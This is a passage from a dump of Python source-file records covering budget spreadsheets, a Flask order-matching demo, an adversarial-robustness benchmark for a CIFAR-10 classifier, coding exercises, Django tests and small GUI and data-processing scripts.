['https://spreadsheets.google.com/feeds']\n creds = ServiceAccountCredentials.from_json_keyfile_name('google_cred.json', scope)\n client = gspread.authorize(creds)\n\n # Find a workbook by name and open the first sheet\n # Budget, Info, Prices\n file = client.open(\"Python Budget\")\n worksheet = file.worksheet(\"Info\")\n\n # Extract and print all of the values\n # list_of_hashes = worksheet.get_all_records()\n fullSum = worksheet.acell('G7').value\n full100 = worksheet.acell('G8').value\n fullText = float(full100) - float(fullSum)\n return fullText\n\ndef getBudget():\n # use creds to create a client to interact with the Google Drive API\n scope = ['https://spreadsheets.google.com/feeds']\n creds = ServiceAccountCredentials.from_json_keyfile_name('google_cred.json', scope)\n client = gspread.authorize(creds)\n\n # Find a workbook by name and open the first sheet\n # Budget, Info, Prices\n file = client.open(\"Python Budget\")\n worksheet = file.worksheet(\"Budget\")\n\n # lastCell is used to hold the last value and then counter is used to calculate\n # when I need 
to add a second letter\n lastCellValue = \"\"\n lastCell = \"\"\n counter = 0\n for c in ascii_lowercase:\n cell = c + str(1)\n value = worksheet.acell(cell).value\n counter = counter + 1\n if float(value) == 0.00:\n cellNumber = ord(c) - 1\n lastCell = str(chr(cellNumber)) + str(1)\n lastCellValue = worksheet.acell(lastCell).value\n break\n return float(lastCellValue)\n\ndef beautifulBudget():\n fullSum = getFullSum()\n weekBudget = 100 - getBudget()\n\n formatedBudget = \"Week Budget : \" + str(weekBudget) + \"\\n\" + \"Full Budget: \" + str(fullSum)\n\n return formatedBudget\n","sub_path":"google_drive.py","file_name":"google_drive.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} {"seq_id":"150032415","text":"#!flask/bin/python\nfrom flask import Flask, request, jsonify\nimport json\nfrom lightmatchingengine.lightmatchingengine import LightMatchingEngine, Side\n\napp = Flask(__name__)\nlme = LightMatchingEngine()\n\n@app.route('/')\ndef index():\n return 'Light Matching Machine REST Demo'\n\n@app.route('/order', methods=['POST'])\ndef submitOrder():\n content = request.get_json()\n print(content)\n instrument = content['instrument']\n price = content['price']\n quantity = content['quantity']\n side = Side.BUY if content['side'] == 'buy' else Side.SELL\n order, trades = lme.add_order(instrument, price, quantity, side)\n return_result = {'status': 'success', 'order-id': order.order_id}\n\n return jsonify(return_result)\n\n@app.route('/order/<order_book>/<order_id>', methods=['GET'])\ndef lookupOrder(order_book, order_id):\n converted_trade_pair = order_book.replace('-', '/')\n print ('/order/ {}'.format(lme.order_books))\n # use .get so an unknown trading pair yields None instead of raising KeyError\n orderbook = lme.order_books.get(converted_trade_pair)\n if orderbook is None:\n return jsonify({'status': 'error', 'message': 'trading pair {} not found'.format(converted_trade_pair)})\n else:\n order = orderbook.order_id_map.get(order_id)\n\n if order is None:\n return jsonify({'status': 'error', 'message': 'order {} not found'.format(order_id)})\n return json.dumps(order.__dict__)\n\n@app.route('/orderbook/<symbol>/<side>', methods=['GET'])\ndef lookupOrderbook(symbol, side):\n converted_trade_pair = symbol.replace('-', '/')\n side = side.lower()\n if converted_trade_pair not in lme.order_books:\n return jsonify({'status': 'error', 'message': 'trading pair {} not found'.format(converted_trade_pair)})\n orderbook = lme.order_books[converted_trade_pair]\n orders = []\n if side == 'buy' or side == 'bid':\n return jsonify({'side': 'bid', 'depth': len(orderbook.bids) , 'orders': orderbook.json('bid')})\n elif side == 'sell' or side == 'ask': \n return jsonify({'side': 'ask', 'depth': len(orderbook.asks) , 'orders': orderbook.json('ask')})\n\n return '{}'\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"lmeRest.py","file_name":"lmeRest.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} {"seq_id":"470797237","text":"from realsafe.cifar10.wideresnet_trades import WideResNet_TRADES\nfrom realsafe.benchmark.distortion_benchmark import DistortionBenchmarkBuilder\nfrom realsafe.benchmark.utils import distortion_benchmark_parser, new_session\nimport tensorflow as tf\nimport numpy as np\n\nSESSION = new_session()\n\n\nargs = distortion_benchmark_parser()\n\nMODEL = WideResNet_TRADES()\n\nMODEL.load(session=SESSION)\nITERATION = 20\n\nbuilder = DistortionBenchmarkBuilder()\nbuilder.init_distortion_l_2(32.0 * (MODEL.x_max - 
MODEL.x_min))\nbuilder.init_distortion_l_inf(1.0 * (MODEL.x_max - MODEL.x_min))\nbuilder.search_steps(0)\nbuilder.binsearch_steps(14)\nbuilder.batch_size(100)\n\nbuilder.config_init_l_2('bim', {})\nbuilder.config_l_2('bim', {\n 'iteration': ITERATION,\n 'session': SESSION\n})\n\nbuilder.config_init_l_inf('bim', {})\nbuilder.config_l_inf('bim', {\n 'iteration': ITERATION,\n 'session': SESSION\n})\n\n\nbuilder.config_init_l_2('mim', {\n 'decay_factor': 1.0\n})\nbuilder.config_l_2('mim', {\n 'iteration': ITERATION,\n 'session': SESSION\n})\n\nbuilder.config_init_l_inf('mim', {\n 'decay_factor': 1.0\n})\nbuilder.config_l_inf('mim', {\n 'iteration': ITERATION,\n 'session': SESSION\n})\n\n\nbuilder.config_init_l_2('fgsm', {})\nbuilder.config_l_2('fgsm', {\n 'session': SESSION\n})\nbuilder.config_init_l_inf('fgsm', {})\nbuilder.config_l_inf('fgsm', {\n 'session': SESSION\n})\n\nbenchmark = \\\n builder.build(SESSION, MODEL, args.method, args.goal, args.distance_metric)\n\nxs_ph = tf.placeholder(tf.float32, shape=(None, *MODEL.x_shape))\n_, labels = MODEL.logits_and_labels(xs_ph)\n\nfor arg_xs, arg_ys, arg_ys_target, arg_output in \\\n zip(args.xs, args.ys, args.ys_target, args.output):\n print(arg_xs)\n print(arg_ys)\n print(arg_ys_target)\n print(arg_output)\n\n xs = np.load(arg_xs).astype(MODEL.x_dtype.as_numpy_dtype)\n xs = (xs / 255.0) * (MODEL.x_max - MODEL.x_min) + MODEL.x_min\n ys = np.load(arg_ys).astype(MODEL.y_dtype.as_numpy_dtype)\n ys_target = np.load(arg_ys_target).astype(MODEL.y_dtype.as_numpy_dtype)\n\n np.save(arg_output, benchmark.run(xs, ys, ys_target))\n ys_adv = SESSION.run(labels, feed_dict={xs_ph: np.load(arg_output)})\n print((ys_adv == ys).astype(np.float32).mean())\n print((ys_adv == ys_target).astype(np.float32).mean())\n","sub_path":"benchmark-v2/cifar_trades_distortion.py","file_name":"cifar_trades_distortion.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} {"seq_id":"525023771","text":"\"\"\"\r\n\n\nGiven a word, create a function which returns whether or not it's possible to\n**create a palindrome** by _rearranging the letters in the word_.\n\n### Examples\n\n is_palindrome_possible(\"rearcac\") ➞ True\n # You can make \"racecar\"\n \n is_palindrome_possible(\"suhbeusheff\") ➞ True\n # You can make \"sfuehbheufs\" (not a real word but still a palindrome)\n \n is_palindrome_possible(\"palindrome\") ➞ False\n # It's impossible\n\n### Notes\n\n * Trivially, words which are already palindromes return `True`.\n * Words are given in all _lowercase_.\n\n\"\"\"\r\n\ndef is_palindrome_possible(txt):\n # a rearrangement into a palindrome exists iff at most one letter occurs an odd number of times\n odd_counts = 0\n for ch in set(txt):\n if txt.count(ch) % 2 != 0:\n odd_counts += 1\n return odd_counts <= 1\n\n","sub_path":"eyJ4mN6RpyiRTvSob_22.py","file_name":"eyJ4mN6RpyiRTvSob_22.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} {"seq_id":"400441669","text":"\n\n#class header\nclass _DICTATOR():\n\tdef __init__(self,): \n\t\tself.name = \"DICTATOR\"\n\t\tself.definitions = [u'a leader who has complete power in a country and has not been elected by the people', u'a person who gives orders and behaves as if they have complete power: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn 
self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_dictator.py","file_name":"_dictator.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"427793739","text":"\"\"\"\nProcessMODISdata.py\n\nMain program for processing MODIS raw data. This program is responsible for\n* checking that processed files are not already present\n* distributing files to process over user specified number of cores\n* delegating actual processing to helper class\n\n\"\"\"\n__author__ = 'Jane'\n\nimport sys\nimport argparse\nimport modis_config.src.configuration as cfg\nimport modis_config.src.constants as cfg_const\nimport gdal_processing as proc\n\ndef create_parser(args=None):\n \"\"\"\n Set up and process arguments passed into program\n :param args: optional argument which defaults to nothing, only used in testing.\n :return: Invocation arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='All configuration parameters are contained in ./land_cover_config.ini'\n 'Use -f switch to override with an alternative file.')\n parser.add_argument('-file', '-f', default=cfg_const.defs['file'], nargs='?',\n help=\"Name of configuration file to load\")\n parser.add_argument('-test', '-t', action=\"store_true\",\n help=\"Run program in test mode, development only\")\n return parser.parse_args(args=args)\n\n\ndef main(args):\n \"\"\"\n\n :param args: Namespace object containing given command line options\n\n :return: none\n :except: IOError if there is no configuration file\n :except: RuntimeError if configuration file is incomplete\n \"\"\"\n config = cfg.Configuration()\n processing = proc.GdalProcessing()\n\n # Let's check the command line switches\n # if we're given a file, load the info.\n try:\n if args.file != cfg_const.defs['file']:\n config.read_config(cfg.Config_mode.MODISproc, args.file)\n else:\n config.read_config(cfg.Config_mode.MODISproc, cfg_const.defs['file'])\n except IOError:\n print(\"Missing configuration file. Exiting.\")\n sys.exit(1)\n except RuntimeError:\n print(\"Configuration file has values missing. 
Exiting.\")\n sys.exit(1)\n\n # pass config instance to gdal_processing\n processing.set_config_object(config)\n try:\n processing.do_gdal_processing(args.test)\n except IOError:\n sys.exit(1)\n\nif __name__ == '__main__':\n parse_args = create_parser()\n main(parse_args)\n","sub_path":"Operational python/ProcessMOD/src/processMODISdata.py","file_name":"processMODISdata.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"44419263","text":"# -*- coding: utf-8 -*-\n\"\"\"The Windows services event formatter.\n\nThe Windows services are derived from Windows Registry files.\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nfrom plaso.formatters import manager\nfrom plaso.formatters import interface\nfrom plaso.winnt import human_readable_service_enums\n\n\nclass WinRegistryServiceFormatter(interface.ConditionalEventFormatter):\n \"\"\"Formatter for a Windows service event.\"\"\"\n\n DATA_TYPE = 'windows:registry:service'\n\n FORMAT_STRING_PIECES = [\n '[{key_path}]',\n 'Type: {service_type}',\n 'Start: {start_type}',\n 'Image path: {image_path}',\n 'Error control: {error_control}',\n '{values}']\n\n FORMAT_STRING_SHORT_PIECES = [\n '[{key_path}]',\n 'Type: {service_type}',\n 'Start: {start_type}',\n 'Image path: {image_path}',\n 'Error control: {error_control}',\n '{values}']\n\n def __init__(self):\n \"\"\"Initializes a Windows service event format helper.\"\"\"\n super(WinRegistryServiceFormatter, self).__init__()\n helper = interface.EnumerationEventFormatterHelper(\n default='UNKNOWN', input_attribute='error_control',\n output_attribute='error_control', values=(\n human_readable_service_enums.SERVICE_ENUMS['ErrorControl']))\n\n self.helpers.append(helper)\n\n helper = interface.EnumerationEventFormatterHelper(\n default='UNKNOWN', input_attribute='service_type',\n output_attribute='service_type', values=(\n human_readable_service_enums.SERVICE_ENUMS['Type']))\n\n self.helpers.append(helper)\n\n helper = interface.EnumerationEventFormatterHelper(\n default='UNKNOWN', input_attribute='start_type',\n output_attribute='start_type', values=(\n human_readable_service_enums.SERVICE_ENUMS['Start']))\n\n self.helpers.append(helper)\n\n\nmanager.FormattersManager.RegisterFormatter(WinRegistryServiceFormatter)\n","sub_path":"plaso/formatters/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"627764419","text":"# Author: Jorge Rodriguez\n# Date: April 25, 2017\n# Employee and ProductionWorker Class, assignment\n\nfrom chapter11 import employee\n\n# Get employee information\nname = input(\"Enter Production Worker employee's name: \")\nemp_number = input(\"Employee's number: \")\nshift = int(input(\"Shift number (day=1 or night=2): \"))\npay_rate = input(\"Hourly pay rate: $\")\n\n# Determine the shift\nif shift == 1:\n shift = \"Day shift\"\nelse:\n shift = \"Night shift\"\n\n# Create an instance of Production Worker\nproduction_worker = employee.ProductionWorker(name, emp_number, shift, pay_rate)\n\nprint(\"Name of production worker employee:\", name)\nprint(f\"Number of employee : #{emp_number}\")\nprint(\"Shift:\", shift)\nprint(f\"Pay rate: ${pay_rate}\")\n","sub_path":"chapter11/worker_demo.py","file_name":"worker_demo.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} 
+{"seq_id":"177156607","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 22 10:30:55 2018\n\n@author: xsxsz\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\nlist=np.linspace(0,20,20,dtype='int')\ndataset=tf.data.Dataset.from_tensor_slices(list)\ndataset=dataset.map(lambda x:x+1)\ninit=tf.global_variables_initializer()\nsess=tf.Session()\nsess.run(init)\nprint(list)\nprint('------------')\niteration=dataset.make_one_shot_iterator()\nelement=iteration.get_next()\ntry:\n while True:\n print(sess.run(element))\nexcept tf.errors.OutOfRangeError:\n print('end')\nprint('------------')\ndataset1=dataset.batch(32)\niteration1=dataset1.make_one_shot_iterator()\nelement1=iteration1.get_next()\ntry:\n while True:\n print(sess.run(element1))\nexcept tf.errors.OutOfRangeError:\n print('end')\nprint('------------')\ndataset2=dataset.shuffle(buffer_size=10)\niteration2=dataset2.make_one_shot_iterator()\nelement2=iteration2.get_next()\ntry:\n while True:\n print(sess.run(element2))\nexcept tf.errors.OutOfRangeError:\n print('end')\nprint('------------')\ndataset3=dataset.repeat(2)\niteration3=dataset3.make_one_shot_iterator()\nelement3=iteration3.get_next()\ntry:\n while True:\n print(sess.run(element3))\nexcept tf.errors.OutOfRangeError:\n print('end')\n","sub_path":"tensorflow/tensorflow_33_dataset.py","file_name":"tensorflow_33_dataset.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"169034201","text":"# ASK THE USER FOR THE INPUT\ndef ask_input():\n print('Welcome to the assignment #validator')\n assignmentName = input('Enter the assignment number ==>')\n\n return assignmentName.upper()\n\n#CALCULATE THE SUM\ndef calculate_sum(str):\n sum = 0\n index = 0\n for character in str:\n sum += int(character, 16) * index\n index+= 1\n\n return sum\n\ndef get_class(c):\n class_type = 'CS000'\n if c == 'A':\n class_type = 'CS101'\n elif c == 'B':\n class_type = 'CS191'\n elif c == 'C':\n class_type = 'CS201'\n elif c == 'D':\n class_type = 'CS291'\n\n return class_type\n\ndef get_assignment(c):\n assignment_type = 'MISC'\n if c == 'A':\n assignment_type = 'Test'\n elif c == 'B':\n assignment_type = 'Program'\n elif c == 'C':\n assignment_type = 'Quiz'\n elif c == 'D':\n assignment_type = 'Final'\n elif c == 'E':\n assignment_type = 'other'\n\n return assignment_type\n\n# MAIN STARTS HERE\n#---------------------------------------------\nvalid_values = ['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F']\nuser_input = ask_input()\n\nwhile user_input != '':\n if(len(user_input) != 13):\n print ('The value entered was incorrect \\n Assignment # should be 13 characters in length \\n')\n elif user_input[0] not in ['A','B','C','D']:\n print ('The value entered was incorrect \\n The first digit must be a valid class identifier. ABCD \\n')\n elif user_input[1] not in ['A','B','C','D','E']:\n print ('The value entered was incorrect \\n The second digit must be a valid assignment type identifier. 
ABCDE \\n')\n else:\n substring = user_input[2:]\n valid = True\n\n for character in substring:\n if character not in valid_values:\n print('The value entered was incorrect \\n String contains invalid character %s \\n' % character)\n valid = False\n break\n\n if(valid and calculate_sum(user_input[0:-1])%10 != int(user_input[-1])):\n print('You entered the invalid value \\n')\n elif valid:\n print('Value was valid \\n')\n print(\"Assignment \",user_input, \" is for class \",get_class(user_input[0]),\" and is a \",get_assignment(user_input[1]))\n\n user_input = ask_input()\n","sub_path":"Assignment Validator.py","file_name":"Assignment Validator.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"114693795","text":"class Solution:\n \"\"\"\n @param: A: an integer sorted array\n @param: target: an integer to be inserted\n @return: a list of length 2, [index1, index2]\n \"\"\"\n\n def searchRange(self, A, target):\n # write your code here\n res = [-1, -1]\n if len(A) == 0:\n return res\n\n start, end = 0, len(A) - 1\n while start + 1 < end:\n mid = (start + end) // 2\n if A[mid] < target:\n start = mid + 1\n else:\n end = mid\n\n if A[start] == target:\n res[0] = start\n elif A[end] == target:\n res[0] = end\n else:\n return res\n\n start, end = res[0], len(A) - 1\n while start + 1 < end:\n mid = (start + end) // 2\n if A[mid] <= target:\n start = mid\n else:\n end = mid - 1\n\n res[1] = end if A[end] == target else start\n\n return res\n","sub_path":"lintcode/61-search-for-a-range.py","file_name":"61-search-for-a-range.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"379270425","text":"\"\"\"Ejercicio 15: Crear un programa que almacene el diccionario con los créditos de las asignaturas de un curso\r\n{'Matemáticas': 6, 'Física': 4, 'Química': 5} y después muestre por pantalla los créditos de cada asignatura en el formato\r\n tiene créditos, donde es cada una de las asignaturas del curso,\r\n y son sus créditos. 
Al final debe mostrar también el número total de créditos del curso.\r\n\"\"\"\r\n\r\nasignaturas = {\r\n 'Matemáticas': 6,\r\n 'Física': 4,\r\n 'Química': 5,\r\n}\r\nfor asignatura, creditos in asignaturas.items():\r\n print(f'{asignatura} tiene {creditos} créditos')\r\n\r\nvalores = asignaturas.values()\r\n\r\ntotal_creditos = 0\r\nfor valor in valores:\r\n total_creditos += valor\r\nprint(total_creditos)\r\n","sub_path":"Guia1/Ejercicio15.py","file_name":"Ejercicio15.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"278059765","text":"\"\"\"\nAll Adder Simulator\nDepartment of Digital Media 201721107 박성범\n2018.3.22\n\"\"\"\n\nclass LogicGate:\n def __init__(self, n):\n self.label = n\n self.output = None\n\n def getLabel(self):\n return self.label\n\n def getOutput(self):\n self.output = self.performGateLogic()\n return self.output\n\n\nclass BinaryGate(LogicGate):\n def __init__(self, n):\n super(BinaryGate, self).__init__(n)\n self.pinA = None\n self.pinB = None\n\n def getPinA(self):\n if self.pinA == None:\n return int(input(\"Enter Pin A input for gate \" + self.getLabel() + \"-->\"))\n else:\n return self.pinA.getFrom().getOutput()\n\n def getPinB(self):\n if self.pinB == None:\n return int(input(\"Enter Pin B input for gate \" + self.getLabel() + \"-->\"))\n else:\n return self.pinB.getFrom().getOutput()\n\n def setNextPin(self, source):\n if self.pinA == None:\n self.pinA = source\n elif self.pinB == None:\n self.pinB = source\n else:\n print(\"Cannot Connect: NO EMPTY PINS\")\n\n\nclass UnaryGate(LogicGate):\n def __init__(self, n):\n super(UnaryGate, self).__init__(n)\n self.pin = None\n\n def getPin(self):\n if self.pin == None:\n return int(input(\"Enter Pin input for gate \" + self.getLabel() + \"-->\"))\n else:\n return self.pin.getFrom().getOutput()\n\n def setNextPin(self, source):\n if self.pin == None:\n self.pin = source\n else:\n print(\"Cannot Connect: NO EMPTY PINS\")\n\n\nclass PinGate(UnaryGate):\n def __init__(self, n):\n super(PinGate, self).__init__(n)\n\n def getPin(self):\n if self.pin == None:\n self.setPin(int(input(\"Enter Pin input for gate \" + self.getLabel() + \"-->\")))\n return self.pin\n\n def setPin(self, val):\n self.pin = val\n\n def performGateLogic(self):\n return self.getPin()\n\n\nclass NotGate(UnaryGate):\n def __init__(self, n):\n super(NotGate, self).__init__(n)\n\n def performGateLogic(self):\n return not self.getPin()\n\n\nclass OrGate(BinaryGate):\n def __init__(self, n):\n super(OrGate, self).__init__(n)\n\n def performGateLogic(self):\n a = self.getPinA()\n b = self.getPinB()\n\n if a == 1 or b == 1:\n return 1\n else:\n return 0\n\n\nclass AndGate(BinaryGate):\n def __init__(self, n):\n super(AndGate, self).__init__(n)\n\n def performGateLogic(self):\n a = self.getPinA()\n b = self.getPinB()\n\n if a == 1 and b == 1:\n return 1\n else:\n return 0\n\n\nclass XorGate(BinaryGate):\n def __init__(self, n):\n super(XorGate, self).__init__(n)\n\n def performGateLogic(self):\n a = self.getPinA()\n b = self.getPinB()\n\n x = a and (not b)\n y = (not a) and b\n\n if x == 1 or y == 1:\n return 1\n else:\n return 0\n\n\nclass Connector:\n def __init__(self, fgate, tgate):\n self.fromgate = fgate\n self.togate = tgate\n tgate.setNextPin(self)\n\n def getFrom(self):\n return self.fromgate\n\n def getTo(self):\n return self.togate\n\n\ndef main():\n # Create AND Gates\n andGate = []\n andGateCount = 2\n for i in range(andGateCount):\n label = 
\"AND\" + str(i)\n andGate.append(AndGate(label))\n\n # Create OR Gates\n label = \"OR\"\n orGate = OrGate(label)\n\n # Create XOR Gates\n xorGate = []\n xorGateCount = 2\n for i in range(xorGateCount):\n label = \"XOR\" + str(i)\n xorGate.append(XorGate(label))\n\n # Create Pin Gates\n x = PinGate(\"x\")\n y = PinGate(\"y\")\n z = PinGate(\"z\")\n\n # Connect the gates\n Connector(x, xorGate[0])\n Connector(x, andGate[1])\n Connector(y, xorGate[0])\n Connector(y, andGate[1])\n Connector(z, xorGate[1])\n Connector(z, andGate[0])\n Connector(xorGate[0], andGate[0])\n Connector(xorGate[0], xorGate[1])\n Connector(andGate[1], orGate)\n Connector(andGate[0], orGate)\n\n print(\"Output(C, S): \", orGate.getOutput(), xorGate[1].getOutput())\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"CSE200_Data-Structures/Full-Adder/FullAdder.py","file_name":"FullAdder.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"372463604","text":"import json\n\nfrom django.test import TestCase\n\nfrom django.contrib.admin.models import ADDITION\nfrom corehq.apps.users.model_log import UserModelAction\nfrom corehq.apps.users.util import _get_changed_details\nfrom corehq.apps.users.management.commands.migrate_user_history_to_new_structure import \\\n migrate_user_history_to_log_entry\nfrom corehq.const import USER_CHANGE_VIA_WEB\nfrom corehq.apps.domain.shortcuts import create_domain\nfrom corehq.apps.users.models import UserHistory, WebUser, CommCareUser\n\n\nclass TestMigrateUserHistoryRecords(TestCase):\n domain = \"test-domain\"\n\n @classmethod\n def setUpClass(cls):\n cls.project = create_domain(cls.domain)\n cls.web_user = WebUser.create(cls.domain, 'test@commcarehq.org', '******',\n created_by=None, created_via=None)\n\n @classmethod\n def tearDownClass(cls):\n cls.web_user.delete(cls.domain, deleted_by=None)\n cls.project.delete()\n\n def test_migrate_user_history_to_log_entry(self):\n commcare_user = CommCareUser.create(self.domain, f'test@{self.domain}.commcarehq.org', '******',\n created_by=self.web_user, created_via=USER_CHANGE_VIA_WEB)\n user_change_details = _get_changed_details(commcare_user, UserModelAction.CREATE, {})\n user_history = UserHistory.objects.create(\n by_domain=self.domain,\n for_domain=self.domain,\n user_type=commcare_user.doc_type,\n user_id=commcare_user.get_id,\n changed_by=self.web_user.get_id,\n details={\n 'changes': user_change_details,\n 'changed_via': USER_CHANGE_VIA_WEB,\n },\n message=\"Password Reset\",\n action=UserModelAction.CREATE.value\n )\n self.addCleanup(commcare_user.delete, self.domain, deleted_by=None)\n self.addCleanup(user_history.delete)\n\n log_entry = migrate_user_history_to_log_entry(user_history)\n\n self.assertEqual(log_entry.user_id, self.web_user.get_django_user().pk)\n self.assertEqual(log_entry.object_id, str(commcare_user.get_django_user().pk))\n self.assertEqual(log_entry.action_flag, ADDITION)\n self.assertEqual(log_entry.action_time, user_history.changed_at)\n\n change_message = json.loads(log_entry.change_message)\n self.assertEqual(change_message['details']['changed_via'], USER_CHANGE_VIA_WEB)\n self.assertEqual(change_message['details']['changes'], user_change_details)\n self.assertEqual(change_message['message'], \"Password Reset\")\n self.assertEqual(change_message['user_history_pk'], 
user_history.pk)\n","sub_path":"corehq/apps/users/tests/test_migrate_user_history_records.py","file_name":"test_migrate_user_history_records.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"43926949","text":"import os\n\ntry:\n from psycopg2cffi import compat\n\n compat.register()\nexcept ImportError:\n pass\n\nDEBUG = True\nTEMPLATE = DEBUG\nUSE_TZ = True\nSTATIC_URL = '/static/'\nMEDIA_URL = '/media/'\nSOUTH_TESTS_MIGRATE = False\nPQ_QUEUE_CACHE = False # switch off for tests\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'django-pq',\n 'OPTIONS': {'autocommit': True}\n },\n\n}\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.admin',\n 'pq',\n)\nif os.getenv('SOUTH'):\n INSTALLED_APPS += ('south', )\n\nROOT_URLCONF = 'test_pq.urls'\nSECRET_KEY = '1234'\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_true': {\n '()': 'django.utils.log.RequireDebugTrue',\n },\n },\n 'handlers': {\n 'console': {\n 'level': 'INFO',\n 'filters': ['require_debug_true'],\n 'class': 'logging.StreamHandler',\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n },\n 'py.warnings': {\n 'handlers': ['console'],\n },\n 'pq': {\n 'handlers': ['console'],\n },\n }\n}\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n","sub_path":"test_pq/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"463750508","text":"\nimport argparse\nimport sys\n\nimport numpy as np\nfrom keras.preprocessing import image\nfrom keras.applications import resnet_v2\n\n\ndef get_model():\n return resnet_v2.ResNet50V2(\n include_top=True,\n weights='imagenet',\n input_shape=(224, 224,3)\n )\n\ndef get_image(path):\n img = image.load_img(path, target_size=(224, 224))\n img = image.img_to_array(img, 'channels_last')\n img = (img/255 - 0.5) * 2\n return np.expand_dims(img, axis=0)\n\n\ndef parse_arguments():\n \"\"\" Parses the Arguments \"\"\"\n parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(dest=\"path_to_file\",\n help=\"The file which will be recognized\")\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) == 1:\n print('Script error: enter path to file')\n sys.exit(1)\n\n args = parse_arguments()\n\n input_image = get_image(args.path_to_file)\n model = get_model()\n predictions = model.predict(input_image)\n\n predict_classe = resnet_v2.decode_predictions(predictions, top=1)\n imagenet_id, name, confidence = predict_classe[0][0]\n\n print(\"I am {:.4}% sure it is {}\".format(confidence * 100, name))\n","sub_path":"python/ml-dl/deception/recognizer.py","file_name":"recognizer.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"91217823","text":"from typing import List\n\n\nclass Solution:\n \"\"\"\n Very 
Straightforward.\n \"\"\"\n def fullJustify(self, words: List[str], max_width: int) -> List[str]:\n res, curr, curr_width = [], [], 0\n for word in words:\n if len(curr) + len(word) + curr_width > max_width:\n if len(curr) == 1:\n curr_str = curr[0] + (' ' * (max_width - curr_width))\n else:\n curr_str = self.generate(curr, curr_width, max_width)\n res.append(curr_str)\n curr, curr_width = [], 0\n curr.append(word)\n curr_width += len(word)\n return res + [' '.join(curr).ljust(max_width)]\n\n def generate(self, curr, curr_width, max_width):\n res = ''\n count = len(curr)\n total_space = max_width - curr_width\n average, more = divmod(total_space, count - 1)\n i = 0\n for word in curr:\n res += word + (' ' * average)\n if i < more:\n res += ' '\n i += 1\n return res.rstrip()\n","sub_path":"0068_Text_Justification.py","file_name":"0068_Text_Justification.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"81588043","text":"from tkinter import *\n# 导入ttk\nfrom tkinter import ttk\n\n\nclass App:\n def __init__(self, master):\n self.master = master\n self.initWidgets()\n\n def initWidgets(self):\n # 创建一个位图\n bm = PhotoImage(file='z012serial.png')\n # 创建一个Label,同时指定text和image\n self.label = ttk.Label(\n self.master,\n text='学编程\\n神器',\n image=bm,\n font=('StSong', 20, 'bold'),\n foreground='red'\n )\n self.label.bm = bm\n # 设置Label默认的compound为None\n self.label['compound'] = None\n self.label.pack()\n # 创建Frame容器,用于装多个Radiobutton\n f = ttk.Frame(self.master)\n f.pack(fill=BOTH, expand=YES)\n compounds = ('None', \"LEFT\", \"RIGHT\", \"TOP\", \"BOTTOM\", \"CENTER\")\n # 定义一个StringVar变量,用作绑定Radiobutton的变量\n self.var = StringVar()\n self.var.set('None')\n 